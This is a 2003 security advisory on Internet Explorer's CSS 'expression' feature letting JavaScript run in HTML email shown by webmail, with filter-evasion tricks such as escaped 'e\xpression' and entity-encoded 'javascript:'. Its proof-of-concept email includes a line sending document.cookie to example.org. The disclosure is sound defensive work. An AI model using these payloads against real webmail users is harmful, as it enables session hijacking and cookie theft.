Summary : Multiple web-based mail systems browsed through Internet Explorer
          can allow arbitrary javascript execution.
Date    : 02/10/2003
Author  : Frank Denis <j@pureftpd.org>


       ------------------------[ Description ]------------------------
	 
  The issue described here doesn't reveal a vulnerability in a specific
product. But the combination of features of Internet Explorer with features
of common webmail software can create a vulnerability.

1) Internet Explorer interprets stylesheets for any HTML tag, even
non-existent ones. For instance :

<xbody style="...">

  is not a valid tag, but attributes are evaluated.
  
  It may be considered as a bug or as a logical behavior, your mileage may
vary. And this alone is not a security flaw.

2) Internet Explorer can evaluate Javascript expressions in style sheets
through the "expression" keyword :

<style type="text/css">
a {
  width: expression(6 * 9 + 'px');  
}
</style>

  This is not a bug either, but a proprietary, properly documented extension.

3) Due to the increase of HTML-only email, most popular webmail software can
display HTML email. In this context, Javascript _must_ be removed from every
email. To achieve this result, various tricks are used by webmail software :

 - Removal or mangling of <script> tags,
 
 - Removal or mangling of "javascript:" urls.
 
 - Removal or mangling of properties like "onmouseover".
 

      ------------------------[ Vulnerability ]------------------------

  By combining 2) with 3) and if the webmail doesn't filter out stylesheets
nor the "expression" keyword, any Javascript contained in a message will be
executed as soon as the recipient will display it.

  Some webmail software are aware of that issue for a while and they are
mangling or filtering any occurrence of "expression". However, the mangling
may not work when the name of the property is escaped (like "e\xpression")
as CSS permits. Or it may not work in the context of non-existent-because-
mangled tags. The former worked on Yahoo! until yesterday (the issue was
fixed quickly after being reported, they are nice and reactive guys).

  But most software simply don't know about "expression". They are _not_
faulty, though. This is not a bug nor a vulnerability. "expression" is a
proprietary extension. Webmails don't have to know about every possible
implication of every proprietary extension of every version of every
browser out there.

  However, when the following conditions are met, the Javascript is executed :
  
- "expression" keywords aren't filtered/mangled by the webmail software.

- The client software is Internet Explorer.

- Javascript isn't disabled in the client software. Unfortunately, a lot of
public webmail systems simply don't work when Javascript is disabled.
 

	 ------------------------[ Impact ]------------------------

  Depending on the webmail software, complete control of the client's session
may be possible. Private mail can be deleted or bounced to evil addresses,
cookies and session identifiers can be stolen, etc.


    ------------------------[ Proof of concept ]------------------------
	 	 
  Webmail software like to filter or mangle stylesheets. Some software
totally remove everything inside <head>...</head> tags. Some software
totally remove <body>...</body> tags (possibly killing style info by the way)
instead of converting them to something like <div>...</div>. Some software
totally remove <style>...</style> definitions but accept inline css. 
  This is bad, because it encourages people to send broken HTML 3 code
instead of well-formed, accessible XHTML documents.
  The following HTML email tries to add workarounds for this kind of filters
in order to test whether the "expression" keyword that properly gets
evaluated on Internet Explorer. It currently works at least with IE 6 +
Squirrelmail, Yahoo! and the software of a dozen public and ISP webmail
services I have an account on.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
               "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr">
<head>
  <title>Webmail test</title>
  <meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1" />
</head>
<body style="width:&#x65;xpres\sion(alert(1))">
  <style type="text/css">
h1 {
  he\ight:&#x65;\xpression(alert(2));
  bac\kground-image:&#x65;\xpression('url(http://example.org/'+document.cookie+$
}
  </style>
  <h1 style="width:&#x65;xpression(alert(3))">...</h1>
  <div id="just-for-fun">
    <a href="&#x6A;avascript:window.open(document.location);"
       onmouseover="alert(4)">fireworks</a>
  </div>
</body>
</html>


	   ------------------------[ Fix ]------------------------

  For the end user, there are four ways to avoid this issue :
  
 - Don't use Internet Explorer to connect to webmails.
or/and
 - Disable Javascript.
or/and
 - Configure the webmail to only display mails as plain text.
or/and 
 - Only connect to webmails when you are 100% sure the software it is
powered by completely filters or mangles "expression" keywords and hope that
software and the version won't change silently.


--
 __  /*-      Frank DENIS (Jedi/Sector One) <j@42-Networks.Com>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/